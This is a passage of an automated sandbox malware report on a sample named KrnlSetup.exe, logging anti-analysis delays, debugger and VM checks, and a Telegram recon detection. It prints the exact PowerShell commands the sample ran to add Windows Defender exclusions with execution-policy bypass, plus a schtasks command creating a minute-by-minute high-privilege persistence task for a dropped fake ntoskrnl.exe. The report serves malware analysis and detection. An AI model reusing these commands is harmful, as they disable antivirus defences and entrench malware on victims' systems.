                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1444
                                    Source: C:\Users\user\Desktop\KrnlSetup.exe TID: 3396Thread sleep time: -34126476536362649s >= -30000sJump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exe TID: 3396Thread sleep time: -600000s >= -30000sJump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exe TID: 3396Thread sleep time: -599891s >= -30000sJump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exe TID: 3396Thread sleep time: -599781s >= -30000sJump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exe TID: 3396Thread sleep time: -599672s >= -30000sJump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exe TID: 3396Thread sleep time: -599562s >= -30000sJump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exe TID: 3396Thread sleep time: -599452s >= -30000sJump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exe TID: 3396Thread sleep time: -599344s >= -30000sJump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exe TID: 3396Thread sleep time: -599234s >= -30000sJump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exe TID: 3396Thread sleep time: -599125s >= -30000sJump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exe TID: 3396Thread sleep time: -599015s >= -30000sJump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exe TID: 3396Thread sleep time: -598906s >= -30000sJump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exe TID: 3396Thread sleep time: -598756s >= -30000sJump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exe TID: 3396Thread sleep time: -598638s >= -30000sJump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exe TID: 3396Thread sleep time: -598511s >= -30000sJump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exe TID: 3396Thread sleep time: -598385s >= -30000sJump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exe TID: 3396Thread sleep time: -598266s >= -30000sJump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exe TID: 3396Thread sleep time: -598141s >= -30000sJump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exe TID: 3396Thread sleep time: -597990s >= -30000sJump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exe TID: 3396Thread sleep time: -597859s >= -30000sJump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exe TID: 3396Thread sleep time: -597750s >= -30000sJump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exe TID: 3396Thread sleep time: -597641s >= -30000sJump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exe TID: 3396Thread sleep time: -597531s >= -30000sJump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exe TID: 3396Thread sleep time: -597422s >= -30000sJump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exe TID: 3396Thread sleep time: -597313s >= -30000sJump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exe TID: 3396Thread sleep time: -597188s >= -30000sJump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exe TID: 3396Thread sleep time: -597078s >= -30000sJump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exe TID: 3396Thread sleep time: -596969s >= -30000sJump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exe TID: 3396Thread sleep time: -596844s >= -30000sJump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exe TID: 3396Thread sleep time: -596735s >= -30000sJump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exe TID: 3396Thread sleep time: -596610s >= -30000sJump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exe TID: 3396Thread sleep time: -596485s >= -30000sJump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exe TID: 3396Thread sleep time: -596360s >= -30000sJump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exe TID: 3396Thread sleep time: -596235s >= -30000sJump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exe TID: 3396Thread sleep time: -596110s >= -30000sJump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exe TID: 3396Thread sleep time: -595964s >= -30000sJump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exe TID: 3396Thread sleep time: -595781s >= -30000sJump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exe TID: 3396Thread sleep time: -595656s >= -30000sJump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exe TID: 3396Thread sleep time: -595523s >= -30000sJump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exe TID: 3396Thread sleep time: -595406s >= -30000sJump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exe TID: 3396Thread sleep time: -595296s >= -30000sJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6008Thread sleep time: -9223372036854770s >= -30000sJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4284Thread sleep count: 6693 > 30Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7156Thread sleep count: 2955 > 30Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2140Thread sleep time: -7378697629483816s >= -30000sJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3608Thread sleep count: 8172 > 30Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3608Thread sleep count: 1446 > 30Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4408Thread sleep time: -5534023222112862s >= -30000sJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5652Thread sleep count: 8124 > 30
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5652Thread sleep count: 1444 > 30
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2756Thread sleep time: -5534023222112862s >= -30000s
                                    Source: C:\ProgramData\ntoskrnl.exe TID: 5552Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\ProgramData\ntoskrnl.exe TID: 3176Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\ProgramData\ntoskrnl.exe TID: 3588Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                    Source: C:\ProgramData\ntoskrnl.exeFile Volume queried: C:\ FullSizeInformation
                                    Source: C:\ProgramData\ntoskrnl.exeFile Volume queried: C:\ FullSizeInformation
                                    Source: C:\ProgramData\ntoskrnl.exeFile Volume queried: C:\ FullSizeInformation
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeThread delayed: delay time: 922337203685477Jump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeThread delayed: delay time: 600000Jump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeThread delayed: delay time: 599891Jump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeThread delayed: delay time: 599781Jump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeThread delayed: delay time: 599672Jump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeThread delayed: delay time: 599562Jump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeThread delayed: delay time: 599452Jump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeThread delayed: delay time: 599344Jump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeThread delayed: delay time: 599234Jump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeThread delayed: delay time: 599125Jump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeThread delayed: delay time: 599015Jump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeThread delayed: delay time: 598906Jump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeThread delayed: delay time: 598756Jump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeThread delayed: delay time: 598638Jump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeThread delayed: delay time: 598511Jump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeThread delayed: delay time: 598385Jump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeThread delayed: delay time: 598266Jump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeThread delayed: delay time: 598141Jump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeThread delayed: delay time: 597990Jump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeThread delayed: delay time: 597859Jump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeThread delayed: delay time: 597750Jump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeThread delayed: delay time: 597641Jump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeThread delayed: delay time: 597531Jump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeThread delayed: delay time: 597422Jump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeThread delayed: delay time: 597313Jump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeThread delayed: delay time: 597188Jump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeThread delayed: delay time: 597078Jump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeThread delayed: delay time: 596969Jump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeThread delayed: delay time: 596844Jump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeThread delayed: delay time: 596735Jump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeThread delayed: delay time: 596610Jump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeThread delayed: delay time: 596485Jump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeThread delayed: delay time: 596360Jump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeThread delayed: delay time: 596235Jump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeThread delayed: delay time: 596110Jump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeThread delayed: delay time: 595964Jump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeThread delayed: delay time: 595781Jump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeThread delayed: delay time: 595656Jump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeThread delayed: delay time: 595523Jump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeThread delayed: delay time: 595406Jump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeThread delayed: delay time: 595296Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\ProgramData\ntoskrnl.exeThread delayed: delay time: 922337203685477
                                    Source: C:\ProgramData\ntoskrnl.exeThread delayed: delay time: 922337203685477
                                    Source: C:\ProgramData\ntoskrnl.exeThread delayed: delay time: 922337203685477
                                    Source: KrnlSetup.exe, 00000000.00000002.2625667958.000000001B34A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllw
                                    Source: ntoskrnl.exe.0.drBinary or memory string: vmware
                                    Source: ntoskrnl.exe.0.drBinary or memory string: enxBmyNBiTqbFKM7KnjGBF3tc67i7v6AOgMoU2mlWXJM7lL61vjNPbtD2uPliUTJ5vVmCiYWtxNS8Sz70a4wX3aqK3ueT
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeProcess information queried: ProcessInformationJump to behavior

                                    Anti Debugging

                                    barindex
                                    Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeCode function: 0_2_00007FFD9B787B41 CheckRemoteDebuggerPresent,0_2_00007FFD9B787B41
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeProcess queried: DebugPortJump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeProcess token adjusted: DebugJump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeProcess token adjusted: DebugJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                    Source: C:\ProgramData\ntoskrnl.exeProcess token adjusted: Debug
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeMemory allocated: page read and write | page guardJump to behavior

                                    HIPS / PFW / Operating System Protection Evasion

                                    barindex
                                    Adds a directory exclusion to Windows Defender
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\KrnlSetup.exe'
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\ntoskrnl.exe'
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\KrnlSetup.exe'Jump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\ntoskrnl.exe'Jump to behavior
                                    Bypasses PowerShell execution policy
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\KrnlSetup.exe'
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\KrnlSetup.exe'Jump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'KrnlSetup.exe'Jump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\ntoskrnl.exe'Jump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'ntoskrnl.exe'Jump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "ntoskrnl" /tr "C:\ProgramData\ntoskrnl.exe"Jump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /delete /f /tn "ntoskrnl"Jump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpF6F2.tmp.bat""Jump to behavior
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout 3

                                    Language, Device and Operating System Detection

                                    barindex
                                    Yara detected Telegram Recon
                                    Source: Yara matchFile source: KrnlSetup.exe, type: SAMPLE
                                    Source: Yara matchFile source: C:\ProgramData\ntoskrnl.exe, type: DROPPED
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeQueries volume information: C:\Users\user\Desktop\KrnlSetup.exe VolumeInformationJump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
